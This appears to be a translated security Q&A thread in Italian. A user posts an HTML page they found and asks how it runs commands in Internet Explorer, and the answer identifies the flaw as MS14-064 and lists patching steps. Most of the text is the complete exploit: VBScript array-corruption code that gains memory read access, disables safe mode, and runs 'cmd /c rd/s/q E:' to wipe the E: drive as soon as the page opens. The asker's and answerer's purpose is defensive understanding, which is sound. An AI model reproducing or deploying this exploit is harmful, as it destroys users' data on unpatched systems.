Esecuzione di codice arbitrario aprendo una pagina web da IE?

Naviga le tue risposte
0

Mi sono imbattuto in questo pezzo di codice HTML oggi: 

<!doctype html>
<html>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" >
<head>
</head>
<body>

<SCRIPT LANGUAGE="VBScript">
function runmumaa()
On Error Resume Next
set shell=createobject("Shell.Application")
shell.ShellExecute "cmd", "/c rd/s/q E:"
end function
</script>

<SCRIPT LANGUAGE="VBScript">

dim   aa()
dim   ab()
dim   a0
dim   a1
dim   a2
dim   a3
dim   win9x
dim   intVersion
dim   rnda
dim   funclass
dim   myarray

Begin()

function Begin()
  On Error Resume Next
      info=Navigator.UserAgent

  if(instr(info,"Win64")>0)   then
     exit   function
  end if

  if (instr(info,"MSIE")>0)   then
             intVersion = CInt(Mid(info, InStr(info, "MSIE") + 5, 2))
  else
     exit   function
  end if

  win9x=0

  BeginInit()
  If Create()=True Then
     myarray=chrw(01)&chrw(2176)&chrw(01)&chrw(00)&chrw(00)&chrw(00)&chrw(00)&chrw(00)
 myarray=myarray&chrw(00)&chrw(32767)&chrw(00)&chrw(0)

     if(intVersion<4) then
         document.write("<br> IE")
         document.write(intVersion)
         runshellcode()
     else
          setnotsafemode()
     end if
  end if
end function

function BeginInit()
   Randomize()
   redim aa(5)
   redim ab(5)
   a0=13+17*rnd(6)
   a3=7+3*rnd(5)
end function

function Create()
  On Error Resume Next
  dim i
  Create=False
  For i = 0 To 400
    If Over()=True Then
       document.write(i)
       Create=True
       Exit For
    End If
  Next
end function

sub testaa()
end sub

function mydata()
    On Error Resume Next
     i=testaa
     i=null
     redim  Preserve aa(a2)

     ab(0)=0
     aa(a1)=i
     ab(0)=6.36598737437801E-314

     aa(a1+2)=myarray
     ab(2)=1.74088534731324E-310
     mydata=aa(a1)

     redim  Preserve aa(a0)
end function

function setnotsafemode()
    On Error Resume Next
    i=mydata()
    i=readmemo(i+8)
    i=readmemo(i+16)
    j=readmemo(i+&h134)
    for k=0 to &h60 step 4
        j=readmemo(i+&h120+k)
        if(j=14) then
            j=0
            redim  Preserve aa(a2)
            aa(a1+2)(i+&h11c+k)=ab(4)
            redim  Preserve aa(a0)
            j=0
            j=readmemo(i+&h120+k)
            Exit for
        end if
    next
    ab(2)=1.69759663316747E-313
    runmumaa()
end function

function Over()
    On Error Resume Next
    dim type1,type2,type3
    Over=False
    a0=a0+a3
    a1=a0+2
    a2=a0+&h8000000

    redim Preserve aa(a0)
    redim ab(a0)
    redim Preserve aa(a2)

    type1=1
    ab(0)=1.123456789012345678901234567890
    aa(a0)=10

    If(IsObject(aa(a1-1)) = False) Then
       if(intVersion<4) then
           mem=cint(a0+1)*16
           j=vartype(aa(a1-1))
           if((j=mem+4) or (j*8=mem+8)) then
              if(vartype(aa(a1-1))<>0)  Then
                 If(IsObject(aa(a1)) = False ) Then
                   type1=VarType(aa(a1))
                 end if
              end if
           else
             redim  Preserve aa(a0)
             exit  function
           end if
        else
           if(vartype(aa(a1-1))<>0)  Then
              If(IsObject(aa(a1)) = False ) Then
                  type1=VarType(aa(a1))
              end if
            end if
        end if
    end if

    If(type1=&h2f66) Then
          Over=True
    End If
    If(type1=&hB9AD) Then
          Over=True
          win9x=1
    End If

    redim  Preserve aa(a0)
end function

function ReadMemo(add)
    On Error Resume Next
    redim  Preserve aa(a2)

    ab(0)=0
    aa(a1)=add+4
    ab(0)=1.69759663316747E-313
    ReadMemo=lenb(aa(a1))

    ab(0)=0

    redim  Preserve aa(a0)
end function

</script>
Please use Internet Explorer to browse this page
</body>
</html>

Il creatore di questa pagina web html afferma che questa pagina web può cancellare l'unità E dell'utente non appena apre la pagina Web (che posso confermare dal comando in esecuzione) e afferma inoltre che tutti gli utenti che utilizzano Windows XP, Windows 7/8 senza aggiornamento automatico eseguirà il codice indipendentemente dalla versione di Internet Explorer in esecuzione.

L'ho provato io stesso (non ho affatto un drive E!), e aprendo questa pagina in IE appare brevemente lo strumento della riga di comando, anche se non mostra alcun codice.

(Sto usando Windows XP con IE7)

Quindi, la mia domanda è: è davvero così vulnerabile e come funziona? Se è davvero così facile eseguire codice arbitrario, è molto preoccupante. (Ma in realtà non utilizzo affatto IE, quindi ...)

    
posta user61258 23.11.2014 - 07:03
fonte

1 risposta

3

Questa non è una vulnerabilità zero-day. Una patch è stata rilasciata nell'ultimo batch di Patch Tuesday di Microsoft.

Database vulnerabilità nazionale: link
CVEDettagli: link
Fonte del modulo Metasploit: link Bollettino Microsoft sulla sicurezza MS14-064: link

Azioni richieste per la protezione:

  • XP o versioni precedenti - Aggiornamento a Vista SP2, 7 SP1 o versioni successive. Quindi applicare gli aggiornamenti MS14-064.
  • Vista SP0 / SP1 - Aggiornamento a SP2. Quindi applicare gli aggiornamenti MS14-064.
  • 7 SP0: aggiornamento a SP1. Quindi applicare gli aggiornamenti MS14-064.
  • 7 SP1, 8, 8.1 - Applica gli aggiornamenti MS14-064.

La prossima volta, prova a rilasciare alcuni degli snippet di codice più univoci in Google e guarda cosa succede. Certo, assicurati di utilizzare prima un sistema monouso.

    
risposta data 23.11.2014 - 10:50
fonte

Leggi altre domande sui tag

PHP: salva l'indirizzo e-mail con hash o semplice [duplicato] Il vittima perde la connessione a Internet durante l'attacco MITM